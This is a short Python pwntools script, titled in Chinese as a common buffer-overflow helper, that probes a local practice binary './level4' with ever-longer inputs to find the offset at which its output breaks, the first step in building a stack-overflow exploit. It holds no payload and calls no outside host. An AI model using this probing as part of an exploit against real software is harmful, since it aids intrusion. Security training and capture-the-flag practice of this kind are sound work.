缓冲区溢出常用脚本
爆破返回地址偏移:每次把输入长度加一,直到 ./level4 不再正常输出 "Hello, World!" 为止,以此得到溢出长度
from pwn import *
# Log at debug level for the whole run.
context.log_level = 'debug'
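def find_overflow_lenth():
    """Probe the local ./level4 binary with growing inputs until its reply changes.

    Each round starts a fresh process, sends ``i`` bytes of ``a`` with
    ``sendline`` and reads one line back. The length grows by one for as
    long as that line starts with ``Hello, World!``.

    Returns:
        int: ``i - 1`` when the process answered with a different line, or
        ``i`` when it closed its output before sending any line (EOFError).

    NOTE(review): the two exits report different things (the last length that
    still worked versus the first one that failed) -- confirm which one
    callers expect. The loop has no upper bound, so it only ends once the
    target's response changes.
    """
    # Bytes literals: on Python 3 pwntools returns bytes from recvline(), and
    # bytes.startswith() raises TypeError when given a str prefix.
    expected_prefix = b'Hello, World!'
    i = 1
    while True:
        io = process("./level4")
        try:
            io.sendline(b'a' * i)
            # Named `reply`, not `context`, so the pwntools global `context`
            # is not shadowed inside this function.
            reply = io.recvline()
        except EOFError:
            # The process closed its output before printing a line.
            return i
        finally:
            # Close the child on every path, including unexpected errors, so
            # a long run does not leak processes.
            io.close()
        if not reply.startswith(expected_prefix):
            return i - 1
        i += 1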
# Run the probe once and log the length it returns, in hexadecimal.
lenth = find_overflow_lenth()
log.info('lenth:' + hex(lenth))